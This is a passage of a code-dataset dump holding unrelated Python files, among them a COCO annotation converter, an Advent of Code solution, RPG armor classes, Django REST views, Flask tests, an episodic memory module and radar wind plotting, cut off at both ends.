data[\"licenses\"][i] = {\n \"url\": None,\n \"id\": idx,\n \"name\": \"Property of Schmidt/Kostas\"\n }\n data[\"images\"][i] = {\n \"license\":i,\n \"file_name\":old_database.images[i],\n \"coco_url\":None,\n \"height\":image.height,\n \"width\":image.width,\n \"date_captured\":\"2019\",\n \"flickr_url\":None,\n \"id\":idx\n }\n\n n_annotations = len(labels)\n for a in range(n_annotations):\n [x1,y1,x2,y2] = boxes[a]\n width = x2 - x1\n height = y2 - y1\n ann = {\n \"segmentations\":[[x1,y1,x2,y2]],\n \"area\": width * height,\n \"iscrowd\":0,\n \"image_id\": idx,\n \"bbox\":[x1,y1,width,height],\n \"category_id\":labels[a] + 1,\n \"id\": ann_count\n }\n ann_count += 1\n data[\"annotations\"].append(ann)\n \nwith open('output.json', 'w') as outfile:\n json.dump(data,outfile)\n","sub_path":"maskrcnn_benchmark/data/datasets/bird/annotation_to_json.py","file_name":"annotation_to_json.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"523485512","text":"import respy as rp\nfrom estimagic import maximize\n\n# obtain model input\nparams, options, df = rp.get_example_model(\"kw_97_extended_respy\")\n\n# process model specification\nlog_like = rp.get_log_like_func(params, options, df)\nsimulate = rp.get_simulate_func(params, options)\n\n# perform calibration\nresults, params_rslt = maximize(log_like, params, \"nlopt_bobyqa\")\n\n# conduct analysis\ndf_rslt = simulate(params_rslt)\n","sub_path":"material/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"410609124","text":"def manhattan_distance(x, y):\n return abs(x) + abs(y)\n\n# Map which x/y values change by what value for a given direction.\ndeltas = {\n 'R': (1, 0),\n 'L': (-1, 0),\n 'U': (0, 1),\n 'D': (0, -1)\n}\n\n# Get the coordinate points for a given wire.\ndef find_points(wire):\n points = set()\n paths = wire.split(',')\n x, y, steps = 0, 0, 0\n number_of_steps = {}\n for path in paths:\n direction = path[:1]\n length = int(path[1:])\n deltaX, deltaY = deltas[direction]\n while length > 0:\n length -= 1\n x += deltaX\n y += deltaY\n points.add((x, y))\n steps += 1\n number_of_steps.setdefault((x, y), steps)\n return points, number_of_steps\n\n# Puzzle input.\nwith open('input') as puzzleInput:\n wires = [value for value in puzzleInput.read().splitlines()]\n\npoints_wire_1, number_of_steps_wire1 = find_points(wires[0])\npoints_wire_2, number_of_steps_wire2 = find_points(wires[1])\n\n# We only care about where both wire 1 and wire 2 cross paths.\nintersections = points_wire_1 & points_wire_2\n\n# Figure out the closest intersection.\ndistances = [manhattan_distance(x, y) for x, y in intersections]\n\n# Part 1 answer.\nprint(min(distances))\n\n# The combined steps the wires must take to reach an intersection.\nsteps = [number_of_steps_wire1[(x, y)] + number_of_steps_wire2[(x, y)] for x, y in intersections]\n\n# Part 2 answer\nprint(min(steps))\n","sub_path":"03/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618883875","text":"import random\n\narr = [None] * 100\ntmp = [None] * 99\n\nfor i in range(1, 100):\n arr[i] = i\ntmp += arr\narr[0] = random.randint(1, 99)\nrandom.shuffle(arr)\nprint(arr)\n\nfor i in arr:\n d = tmp[i-1]\n if d == None:\n tmp[i-1] = 1\n else:\n print(\"Duplicate Num: \", i)\n","sub_path":"week2/hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"204132325","text":"from .Armor import LegArmor\r\n\r\nclass BronzePants(LegArmor):\r\n def __init__(self, name=\"Bronze Pants\", value=10, weight=4, strBuff=2, agiBuff=0, intBuff=0, defense=3, hp=0, ap=0, hpR=0, apR=0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-1, 1)\r\n\r\n\r\nclass IronPants(LegArmor):\r\n def __init__(self, name=\"Iron Pants\", value=20, weight=6, strBuff=4, agiBuff=0, intBuff=0, defense=4, hp=0, ap=0, hpR=0, apR=0, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([1, 0, 0])\r\n self.setWeight(-2.1, 1.1)\r\n\r\n\r\nclass SteelPants(LegArmor):\r\n def __init__(self, name=\"Steel Pants\", value=30, weight=6, strBuff=5, agiBuff=0, intBuff=0, defense=5, hp=0, ap=0, hpR=0, apR=0, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([2, 0, 0])\r\n self.setWeight(-2.5, 2.5)\r\n\r\n\r\nclass PlatinumPants(LegArmor):\r\n def __init__(self, name=\"Platinum Pants\", value=40, weight=7, strBuff=7, agiBuff=0, intBuff=0, defense=6, hp=0, ap=0, hpR=0, apR=0, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([2, 0, 0])\r\n self.setWeight(-1.9, 1.2)\r\n\r\n\r\nclass AdamantinePants(LegArmor):\r\n def __init__(self, name=\"Adamantine Pants\", value=50, weight=10, strBuff=10, agiBuff=2, intBuff=2, defense=9, hp=2, ap=2, hpR=1, apR=0, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([4, 1, 0])\r\n self.setWeight(-2, 2)\r\n\r\n\r\nclass VibraniumPants(LegArmor):\r\n def __init__(self, name=\"Vibranium Pants\", value=50, weight=11, strBuff=15, agiBuff=3, intBuff=3, defense=10, hp=2, ap=3, hpR=2, apR=2, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([9, 1, 0])\r\n self.setWeight(-3, 3)\r\n\r\n#-------------------------------\r\n\r\nclass LightLeatherPants(LegArmor):\r\n def __init__(self, name=\"Light-Leather Pants\", value=10, weight=2, strBuff=0, agiBuff=2, intBuff=0, defense=1, hp=0, ap=1, hpR=0, apR=0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-0.5, 0.2)\r\n\r\n\r\nclass HeavyLeatherPants(LegArmor):\r\n def __init__(self, name=\"Heavy-Leather Pants\", value=20, weight=4, strBuff=1, agiBuff=3, intBuff=0, defense=2, hp=0, ap=1, hpR=0, apR=0, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 1, 0])\r\n self.setWeight(-0.6, 0.6)\r\n\r\n\r\nclass StuddedLeatherPants(LegArmor):\r\n def __init__(self, name=\"Studded Leather Pants\", value=30, weight=6, strBuff=2, agiBuff=4, intBuff=0, defense=3, hp=0, ap=2, hpR=0, apR=0, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 1, 0])\r\n self.setWeight(-0.5, 0.3)\r\n\r\n\r\nclass WolfFurPants(LegArmor):\r\n def __init__(self, name=\"Wolf Fur Pants\", value=40, weight=5, strBuff=0, agiBuff=5, intBuff=0, defense=4, hp=0, ap=3, hpR=0, apR=0, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 2, 0])\r\n self.setWeight(-0.8, 0.8)\r\n\r\n\r\nclass SnakeSkinPants(LegArmor):\r\n def __init__(self, name=\"Snake Skin Pants\", value=50, weight=5, strBuff=1, agiBuff=6, intBuff=0, defense=5, hp=0, ap=4, hpR=0, apR=2, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 3, 0])\r\n self.setWeight(-1.5, 1.5)\r\n\r\n\r\nclass CloakingPants(LegArmor):\r\n def __init__(self, name=\"Cloaking Pants\", value=60, weight=4, strBuff=0, agiBuff=10, intBuff=0, defense=6, hp=0, ap=5, hpR=1, apR=4, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 7, 0])\r\n self.setWeight(-1, 1.2)\r\n\r\n#-------------------------------\r\n\r\nclass BeginnerPants(LegArmor):\r\n def __init__(self, name=\"Beginner Pants\", value=10, weight=3, strBuff=0, agiBuff=0, intBuff=1, defense=1, hp=0, ap=2, hpR=0, apR=1, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 0])\r\n self.setWeight(-0.5, 0.5)\r\n\r\n\r\nclass NovicePants(LegArmor):\r\n def __init__(self, name=\"Novice Pants\", value=20, weight=3, strBuff=0, agiBuff=0, intBuff=3, defense=2, hp=0, ap=3, hpR=0, apR=2, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 1])\r\n self.setWeight(-0.7, 0.8)\r\n\r\n\r\nclass ApprenticePants(LegArmor):\r\n def __init__(self, name=\"Apprentice Pants\", value=30, weight=3, strBuff=0, agiBuff=0, intBuff=6, defense=3, hp=0, ap=5, hpR=0, apR=3, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 2])\r\n self.setWeight(-0.5, 0.5)\r\n\r\nclass WizardPants(LegArmor):\r\n def __init__(self, name=\"Wizard Pants\", value=40, weight=4, strBuff=0, agiBuff=0, intBuff=9, defense=5, hp=0, ap=7, hpR=0, apR=4, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 6])\r\n self.setWeight(-0.7, 0.7)\r\n\r\n\r\nclass MasterPants(LegArmor):\r\n def __init__(self, name=\"Master Pants\", value=50, weight=3, strBuff=2, agiBuff=2, intBuff=15, defense=7, hp=0, ap=10, hpR=0, apR=5, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, defense, hp, ap, hpR, apR, tier)\r\n self.setStats([0, 0, 9])\r\n self.setWeight(-0.7, 0.8)\r\n","sub_path":"Content/Items/Armor/LegArmor.py","file_name":"LegArmor.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"287375728","text":"def main():\n f = open(\"input.txt\",\"r\")\n line = f.readline()\n print(line)\n\n change = list()\n result = \"\"\n for i in range(len(line)):\n change.append(ord(line[i])+1)\n \n\n for i in range(len(change)-1):\n result = result + chr(change[i])\n \n print(result)\n f.close()\n\nmain()\n","sub_path":"practice1/cypher_3_2018110047.py","file_name":"cypher_3_2018110047.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291610593","text":"from django.shortcuts import render\n\nfrom django.http.response import JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\n\nfrom aperetteAPI.models import Aperette, Categorie, Ingredient\nfrom aperetteAPI.serializers import AperetteSerializer, CategorieSerializer, IngredientSerializer\n\nfrom rest_framework.decorators import api_view\n\nfrom django.conf.urls import url\nfrom rest_framework_swagger.views import get_swagger_view\n\nschema_view = get_swagger_view(title='Pastebin API')\n\nurlpatterns = [\n url(r'^$', schema_view)\n]\n\n@api_view(['GET', 'POST'])\ndef aperettes_list(request):\n if request.method == 'GET':\n aperettes = Aperette.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n aperettes = aperettes.filter(nom__icontains=nom)\n\n aperettes_serializer = AperetteSerializer(aperettes, many=True)\n return JsonResponse(aperettes_serializer.data, safe=False)\n\n elif request.method == 'POST':\n aperette_data = JSONParser().parse(request)\n aperette_serializer = AperetteSerializer(data=aperette_data)\n if aperette_serializer.is_valid():\n aperette_serializer.save()\n return JsonResponse(aperette_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(aperette_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'PUT'])\ndef aperette_detail(request, pk):\n try:\n aperette = Aperette.objects.get(pk=pk)\n except Aperette.DoesNotExist:\n return JsonResponse({'message': 'Cet aperette n\\'existe pas'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n aperette_serializer = AperetteSerializer(aperette)\n return JsonResponse(aperette_serializer.data)\n\n elif request.method == 'PUT':\n aperette_data = JSONParser().parse(request)\n aperette_serializer = AperetteSerializer(aperette, data=aperette_data)\n if aperette_serializer.is_valid():\n aperette_serializer.save()\n return JsonResponse(aperette_serializer.data)\n return JsonResponse(aperette_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'POST'])\ndef categories_list(request):\n if request.method == 'GET':\n categories = Categorie.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n categories = categories.filter(nom__icontains=nom)\n\n categories_serializer = CategorieSerializer(categories, many=True)\n return JsonResponse(categories_serializer.data, safe=False)\n\n elif request.method == 'POST':\n categorie_data = JSONParser().parse(request)\n categorie_serializer = CategorieSerializer(data=categorie_data)\n if categorie_serializer.is_valid():\n categorie_serializer.save()\n return JsonResponse(categorie_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(categorie_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT'])\ndef categorie_detail(request, pk):\n try:\n categorie = Categorie.objects.get(pk=pk)\n except Categorie.DoesNotExist:\n return JsonResponse({'message': 'Cette catégorie n\\'existe pas'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n categorie_serializer = CategorieSerializer(categorie)\n return JsonResponse(categorie_serializer.data)\n\n elif request.method == 'PUT':\n categorie_data = JSONParser().parse(request)\n categorie_serializer = CategorieSerializer(categorie, data=categorie_data)\n if categorie_serializer.is_valid():\n categorie_serializer.save()\n return JsonResponse(categorie_serializer.data)\n return JsonResponse(categorie_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(['GET', 'POST'])\ndef ingredients_list(request):\n if request.method == 'GET':\n ingredients = Ingredient.objects.all()\n\n nom = request.GET.get('nom', None)\n if nom is not None:\n ingredients = ingredients.filter(nom__icontains=nom)\n\n ingredients_serializer = IngredientSerializer(ingredients, many=True)\n return JsonResponse(ingredients_serializer.data, safe=False)\n\n elif request.method == 'POST':\n ingredient_data = JSONParser().parse(request)\n ingredient_serializer = IngredientSerializer(data=ingredient_data)\n if ingredient_serializer.is_valid():\n ingredient_serializer.save()\n return JsonResponse(ingredient_serializer.data, status=status.HTTP_201_CREATED)\n return JsonResponse(ingredient_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET', 'PUT'])\ndef ingredient_detail(request, pk):\n try:\n ingredient = Ingredient.objects.get(pk=pk)\n except Ingredient.DoesNotExist:\n return JsonResponse({'message': 'Cet ingrédient n\\'existe pas'}, status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n ingredient_serializer = IngredientSerializer(ingredient)\n return JsonResponse(ingredient_serializer.data)\n\n elif request.method == 'PUT':\n ingredient_data = JSONParser().parse(request)\n ingredient_serializer = IngredientSerializer(ingredient, data=ingredient_data)\n if ingredient_serializer.is_valid():\n ingredient_serializer.save()\n return JsonResponse(ingredient_serializer.data)\n return JsonResponse(ingredient_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"aperetteAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"21542699","text":"#!/usr/bin/env python3\n\n#General Packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n#Packages to make life easier\nfrom tqdm import tqdm, trange\nimport os, yaml, glob, pickle\nfrom PIL import Image\n\ndef transparent_cmap(cmap, N=255):\n \"Copy colormap and set alpha values\"\n\n mycmap = cmap\n mycmap._init()\n mycmap._lut[:,-1] = np.linspace(0, 0.8, N+4)\n return mycmap\n\ndef make_image(path_to_map,path_to_data):\n c = (1500,1700,2500,2500)\n #Use base cmap to create transparent\n mycmap = transparent_cmap(plt.cm.gray)\n\n\n # Import image and get x and y extents\n I = Image.open(path_to_map+'map.pgm')\n p = np.asarray(I).astype('float')\n w, h = I.size\n y, x = np.mgrid[0:h, 0:w]\n\n #Plot image and overlay colormap\n fig, ax = plt.subplots(1, 1)\n #ax.imshow(I.crop(c), cmap='gray')\n heatmap = make_heatmap(path_to_map,path_to_data)\n cb = ax.imshow(heatmap[c[1]:c[3],c[0]:c[2]],cmap=cm.spectral)\n\n plt.colorbar(cb)\n plt.show()\n\ndef make_heatmap(path_to_map,path_to_data):\n step = 1\n map_params = yaml.load(open(path_to_map + 'map.yaml', 'rb'))\n I = Image.open(path_to_map+'map.pgm')\n w,h = I.size\n files = glob.glob(path_to_data + '*.p')\n # print(files)\n im = np.zeros((int(w/step),int(h/step)), dtype=int)\n origin = map_params['origin']\n resolution = map_params['resolution']*step\n\n\n for file in tqdm(files):\n dataset = pickle.load(open(file,'rb'))\n for data in dataset:\n if data[1] > 1000:\n continue\n for point in data[2]:\n x = point.position.x - origin[0]\n y = point.position.y - origin[1]\n x_coord = int(x / resolution)\n y_coord = int(h/step) - int(y / resolution) - 1\n im[y_coord,x_coord] = im[y_coord,x_coord] + 1\n # max = im.max()\n # for i in range(len(im)):\n # for j in range(len(im[i])):\n # im[i][j] = int(255 * im[i][j] / max)\n # heatmap = np.zeros([w,h,4],dtype=np.uint8)\n heatmap = np.zeros((w,h),dtype=int)\n for i in trange(len(heatmap)):\n for j in range(len(heatmap[i])):\n d = im[int(i/step)][int(j/step)]\n # heatmap[i][j]=float(d)\n n = 0\n while(1):\n if d < (10 ** n):\n heatmap[i][j] = n - .5\n break\n n = n+.5\n # if im[int(i/step)][int(j/step)] == 0:\n # heatmap[i][j] = (255,255,255,0)\n for i in trange(len(heatmap)):\n for j in range(len(heatmap[i])):\n if im[int(i/step)][int(j/step)] > 0:\n heatmap[i][j] = heatmap[i][j] + 1\n return heatmap\n\n\nif __name__ == \"__main__\":\n map_path = '/home/sage/Desktop/ebola/'\n data_path = '/home/sage/Desktop/ebola/etu_1_condensed/'\n\n make_image(map_path,data_path)\n","sub_path":"old_files/place_mapper.py","file_name":"place_mapper.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"307472119","text":"import PySimpleGUI as sg\r\nimport buyoption\r\nimport show_options\r\n\r\n\r\ndef buy(public_key, private_key):\r\n\r\n layout = [\r\n [sg.Text(\"Press VIEW to see available options\")],\r\n [sg.Button(\"VIEW\")],\r\n [sg.Text(\"Which option would you like to buy (enter N)\")],\r\n [sg.Input(key=\"NUMBER\")],\r\n [sg.Button(\"BUY\", bind_return_key=True), sg.Button(\"CANCEL\")],\r\n ]\r\n\r\n window = sg.Window(\"Buy Options\", layout)\r\n\r\n while True:\r\n event, values = window.read()\r\n print(event, values)\r\n if event == \"VIEW\":\r\n show_options.show()\r\n elif event == \"BUY\":\r\n buyoption.buy(int(values[\"NUMBER\"]), public_key, private_key)\r\n else:\r\n break\r\n\r\n window.close()\r\n","sub_path":"buy_gui.py","file_name":"buy_gui.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612246431","text":"import os\n\nfrom flaskr import create_app\n\n\ndef test_config():\n # make sure passing test config works as expected\n assert not create_app().testing\n assert create_app({'TESTING': True}).testing\n\n\ndef test_hello(client):\n response = client.get('/hello')\n assert response.get_json() == {'message': 'Hello, World!'}\n\n\nclass TestGetSpecificBook(object):\n\n def test_get_book_success(self, client):\n response = client.get('/books/4').get_json()\n assert response[\"success\"]\n assert response['book'] == {'id': 4,\n 'title': 'Educated: A Memoir',\n 'author': 'Tara Westover',\n 'rating': 5}\n\n def test_get_book_failure(self, client):\n response = client.get('books/400').get_json()\n assert not response[\"success\"]\n assert response[\"error\"] == 404\n\n\nclass TestAddBook(object):\n\n def test_add_book_success(self, client):\n response = client.post('/books', json={'title': 'Bible',\n 'author': 'God',\n 'rating': 1}).get_json()\n assert response[\"success\"]\n\n def test_add_book_failure(self, client):\n response = client.post('/books', json={'random': 123}).get_json()\n assert not response[\"success\"]\n assert response[\"error\"] == 400\n\n\nclass TestSearchBook(object):\n\n def test_search_book_success(self, client):\n response = client.post('/books', json={'search': 'NOVEL'}).get_json()\n assert response[\"success\"]\n assert response[\"total_books\"] == 4\n","sub_path":"backend/tests/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"3491888","text":"#### Episodic Memory Cache\n\n'''\nObject Classes and Relevant Functions for Episodic Memory Module\nAuthor: Annik Carson \n-- June 2018\n'''\n\n# =====================================\n# IMPORT MODULES #\n# =====================================\nfrom __future__ import division, print_function\nimport numpy as np\nimport time\n\nclass ep_mem(object):\n\tdef __init__(self, model, cache_limit,**kwargs):\n\t\tself.cache_list \t\t= {}\t\t\t\t\t\t\t\t# memory bank object\n\t\tself.cache_limit \t\t= cache_limit # size of memory bank\n\t\tself.n_actions\t\t\t= model.layers[-1]\t\t\t\t\t# number of rows in each memory unit\n\n\t\tself.memory_envelope \t= kwargs.get('mem_envelope', 50) # speed of memory decay\n\n\t\t##\n\t\tself.mem_factor = 0.5\n\t\tself.reward_unseen = True\n\t\tself.time_since_last_reward= 0\n\t\tself.confidence_score = 0\n\t\tself.cs_max = 0\n\n\tdef reset_cache(self):\n\t\tself.cache_list.clear()\n\n\tdef add_mem(self, item):\n\t\tactivity \t= item['activity']\n\t\taction\t\t= item['action']\n\t\tdelta \t\t= item['delta']\n\t\ttimestamp\t= item['timestamp']\n\t\ttrial = item['trial']\n\t\t#\n\t\treadable = item['readable']\n\n\t\t# Case 1: memory is not full\n\t\tif len(self.cache_list) < self.cache_limit:\n\t\t\t# Case 1a: key does not yet exist\n\t\t\tif activity not in self.cache_list.keys(): # if no key for this state exists already, add new one\n\t\t\t\tmem_entry = np.empty((self.n_actions, 2))\n\t\t\t\tmem_entry[:,0] = np.nan # initialize deltas to nan\n\t\t\t\tmem_entry[:,1] = np.inf # initialize timestamps to inf\n\t\t\t\tself.cache_list[activity] = [mem_entry, np.inf, None]\n\t\t\t# Case 1b: key exists, add or replace relevant info in mem container\n\t\t\tself.cache_list[activity][0][action] = [delta, trial]\n\t\t\tself.cache_list[activity][1] = timestamp\n\t\t\tself.cache_list[activity][2] = readable\n\t\t# Case 2: memory is full\n\t\telse:\n\t\t\t# Case 2a: key does not yet exist\n\t\t\tif activity not in self.cache_list.keys():\n\t\t\t\t# choose key to be removed\n\t\t\t\tcache_keys = list(self.cache_list.keys())\n\t\t\t\tpersistence_ = [x[1] for x in self.cache_list.values()] # get list of all timestamp flags\n\t\t\t\tlp = persistence_.index(min(persistence_)) # find entry that was updated the LEAST recently\n\t\t\t\told_activity = cache_keys[lp] # get key in dictionary corresponding to oldest timestep flag\n\t\t\t\tdel self.cache_list[old_activity] # delete item from dictionary with oldest timestamp flag\n\n\t\t\t\t# add new mem container\n\t\t\t\tmem_entry = np.empty((self.n_actions, 2))\n\t\t\t\tmem_entry[:,0] = np.nan\n\t\t\t\tmem_entry[:,1] = np.inf # initialize entries to nan\n\t\t\t\tself.cache_list[activity] = [mem_entry, np.inf, None]\n\t\t\t# Case2b: key exists, add or replace relevant info in mem container\n\t\t\tself.cache_list[activity][0][action] = [delta, trial]\n\t\t\tself.cache_list[activity][1] = timestamp\n\t\t\tself.cache_list[activity][2] = readable\n\n\tdef recall_mem(self, key, timestep, **kwargs):\n\t\t'''\n\t\tpass in key: get most similar entry and return cosine sim score\n\n\t\tconfidence score = scaled by cosine sim\n\n\t\t'''\n\t\tself.mem_temp = kwargs.get('mem_temp', 0.1)\n\n\t\tif len(self.cache_list) == 0:\n\t\t\trandom_policy = softmax(np.zeros(self.n_actions))\n\t\t\treturn random_policy\n\t\telse:\n\t\t\t#specify decay envelope for memory relevance calculation\n\t\t\tenvelope = kwargs.get('decay', self.memory_envelope)\n\n\t\t\t# returns the most similar key, as well as the cosine similarity measure\n\t\t\tlin_act, similarity = self.cosine_sim(key)\n\t\t\tmemory = np.nan_to_num(self.cache_list[lin_act][0])\n\t\t\tdeltas = memory[:,0]\n\t\t\t#times = abs(timestep - memory[:,1])\n\t\t\t#pvals \t\t = self.make_pvals(times, envelope=envelope)\n\t\t\tpolicy = softmax( similarity*deltas, T=self.mem_temp) #np.multiply(sim,deltas))\n\n\t\t\treturn policy\n\n\n\tdef make_pvals(self, p, **kwargs):\n\t\tenvelope = kwargs.get('envelope', self.memory_envelope)\n\t\tif isinstance(p,int):\n\t\t\tratio = p/envelope\n\t\t\treturn np.round(1 / np.cosh(ratio), 8)\n\t\telse:\n\t\t\tratio = np.around(p/envelope, 8)\n\t\t\treturn np.round(1 / np.cosh(ratio), 8)\n\n\t# retrieve relevant items from memory\n\tdef cosine_sim(self, key):\n\t\t# make list of memory keys\n\t\tmem_cache = np.asarray(list(self.cache_list.keys()))\n\n\t\tentry = np.asarray(key)\n\t\t# compute cosine similarity measure\n\t\tmqt = np.dot(mem_cache, entry)\n\t\tnorm = np.linalg.norm(mem_cache, axis=1) * np.linalg.norm(entry)\n\t\tcosine_similarity = mqt / norm\n\n\t\tlin_act = mem_cache[np.argmax(cosine_similarity)]\n\t\treturn tuple(lin_act), max(cosine_similarity)\n\ndef sigmoid(x):\n\treturn 1 / (1 + math.exp(-x))\n\ndef softmax(x, T=1):\n\te_x = np.exp((x - np.max(x))/T)\n\treturn np.round(e_x / e_x.sum(axis=0),8) # only difference\n\ndef plot_softmax(x):\n\tf, axarr = plt.subplots(2, sharex=True)\n\taxarr[0].bar(np.arange(len(x)), x)\n\ty = softmax(x) \n\taxarr[1].bar(np.arange(len(x)), y) \n\tplt.show()\n\ndef calc_env(halfmax):\n\t'''\n\t:param halfmax: x value for which envelope will give sech(x/env) = 0.5\n\t:return: envelope value\n\te^(x/env) = (2+np.sqrt(3)) for sech(x/env) = 0.5\n\tHence x/env = np.log(2+np.sqrt(3)) and env = x/ np.log(2+np.sqrt(3))\n\t'''\n\treturn halfmax/np.log(2+np.sqrt(3))\n","sub_path":"memory/episodic.py","file_name":"episodic.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"397395723","text":"Blue = 0\r\nRed = 0\r\nYellow = 0\r\nGreen = 0\r\nGold = 1\r\nHealth = 100\r\nExperience = 0\r\n\r\nif Gold == 1:\r\n print(\"The chest opens\")\r\n Health += 50\r\n Experience += 100\r\n \r\n\r\nelif Blue == 1:\r\n print(\"DEATH Appears\")\r\n Health -= 100\r\n\r\nelif Red == 1:\r\n print(\"The chest burns you\")\r\n Health -= 50\r\n\r\nelif Yellow == 1:\r\n print(\"A monster appears behind you\")\r\n\r\nelif Green == 1:\r\n print(\"A giant boulder falls from the ceiling and rolls toward you\")\r\n\r\n\r\nelse:\r\n print(\"You need a key to open this\")\r\n\r\nprint(\"Health:\", Health)\r\nprint(\"Experience:\", Experience)\r\n\r\nif Health <= 0:\r\n print(\"GAME OVER\")\r\nelse:\r\n print(\"\")\r\n","sub_path":"RPG.py","file_name":"RPG.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"237140559","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport datetime\nimport xarray\nimport datetime\nimport os\n\nfrom .config import get_plot_values\n\ndef quicklooks(file, config, image_directory=None):\n \"\"\"\n Quicklook, produces a single image using a VAD object netCDF file.\n \n Parameters\n ----------\n file : str\n File path to the VAD NetCDF file\n config : str\n A string of the radar name found from config.py that contains values\n for writing, specific to that radar\n \n Other Parameters\n ----------------\n image_directory : str\n File path to the image folder to save the VAD image. If no\n image file path is given, image path deafults to users home directory.\n \n \"\"\"\n if image_directory is None:\n image_directory = os.path.expanduser('~')\n plot_values = get_plot_values(config)\n vad = xarray.open_dataset(file)\n \n u = vad.u_wind.data[::6,::5]/0.514444\n v = vad.v_wind.data[::6,::5]/0.514444\n z = vad.height.data[::5]/1000\n C = vad.speed.data[::6,::5]/0.514444\n t = vad.time[::6].data\n date = pd.to_datetime(vad.time[0].data).strftime('%Y%m%d')\n ts = datetime.datetime.strptime(date, '%Y%m%d')\n \n \n fig = plt.figure(figsize=[25,12])\n font = {'family': 'normal',\n 'size': 20}\n matplotlib.rc('font', **font)\n matplotlib.rcParams.update({'font.size': 20})\n matplotlib.rcParams.update({'axes.titlesize': 20})\n \n for i in range(len(t)):\n Xq, Yq = np.meshgrid(t[i], z)\n img = plt.barbs(Xq[:,0], Yq[:,0], u[i], v[i],\n C[i], cmap = plot_values['cmap'],\n norm=plot_values['norm'],\n sizes=dict(emptybarb=0.1), rounding=False,\n 